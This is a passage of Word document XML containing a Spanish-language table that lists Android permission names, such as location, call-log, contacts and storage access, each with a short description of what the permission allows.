                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la escritura a almacenamiento externo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="43C317B1" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E5568C1" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>READ_EXTERNAL_STORAGE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DA0900C" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la lectura de almacenamiento externo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="0B9CED3D" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E70BA64" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>REQUEST_IGNORE_BATTERY_OPTIMIZATIONS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35AB670B" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite solicitar al usuario la opción de ignorar optimizaciones de batería para la aplicación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="27A10845" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E45E147" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>FOREGROUND_SERVICE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E02965" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el comienzo de un servicio en primer plano</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="38B9DC16" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67C70D37" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>REQUEST_INSTALL_PACKAGES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A52E220" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite que la aplicación solicite instalar paquetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="5E579E61" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D3D1880" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>GET_PACKAGE_SIZE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BE1BE8B" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite conocer el tamaño de cualquier paquete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="175125DF" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6263DECE" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>PACKAGE_USAGE_STATS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C67706F" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la recopilación de estadísticas de uso de paquetes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="7ED79762" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F26A3CC" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ACCESS_BACKGROUND_LOCATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28667D09" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el acceso a la ubicación cuando la aplicación se encuentra en segundo plano</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="6DA84B3E" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FD797FE" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ACCESS_FINE_LOCATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CEEBBD1" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el acceso a la ubicación precisa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="64CC7490" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C5B6F33" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ACCESS_COARSE_LOCATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC5E41A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el acceso a la ubicación aproximada</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="2A2FB0E5" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12A09E38" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>WRITE_SECURE_SETTINGS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36E27F05" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la lectura y escritura de ajustes seguros del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="4D29FB0D" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02A1FF03" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>GET_TASKS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC0C3F3" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite acceso a tareas (valor deprecado desde Android 5.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="39C418D6" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E90EDEC" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>DISABLE_KEYGUARD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79046C85" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite desactivar el keyguard (pantalla de bloqueo) en el caso de no considerarse seguro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="63C5723C" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32F9A096" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>RECEIVE_LAUNCH_BROADCASTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D9261FA" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Función no recogida en la documentación de Android</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="16E55DB1" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28BC4D67" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>READ_CONTACTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AF22795" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la lectura de los contactos del usuario del dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="3A597538" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78480B9D" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>RECEIVE_BOOT_COMPLETED</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EF28EB3" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la recepción de una transmisión notificadora cuando el dispositivo finaliza su arranque</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="51BBEC16" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14F2B97E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>WRITE_CALL_LOG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EC2C993" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la escritura en el registro de llamadas del usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="69139AA0" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="315CE01C" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>READ_CALL_LOG</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="530E5D06" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la lectura en el registro de llamadas del usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="58C77059" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="301FD819" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>QUERY_ALL_PACKAGES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50B2071B" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la obtención de información de todos los paquetes presentes en el dispositivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="75B4DE1A" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="762DE27E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ACTION_MANAGE_OVERLAY_PERMISSION</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5956E5A5" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite la superposición de gráficos sobre otras aplicaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="480B380B" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36B9929E" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>ACCESS_WIFI_STATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="083A84F4" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite el acceso a la información sobre redes Wi-Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="27AA73FC" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7171C8B2" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>CHANGE_WIFI_STATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4017" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="352D588A" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="001D65C9">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Permite modificar el estado de conexión Wi-Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00337CE1" w14:paraId="67052305" w14:textId="77777777" w:rsidTr="001D65C9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4986" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="513059D2" w14:textId="77777777" w:rsidR="00337CE1" w:rsidRDefault="00337CE1" w:rsidP="0034459D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>BLUETOOTH_SCAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
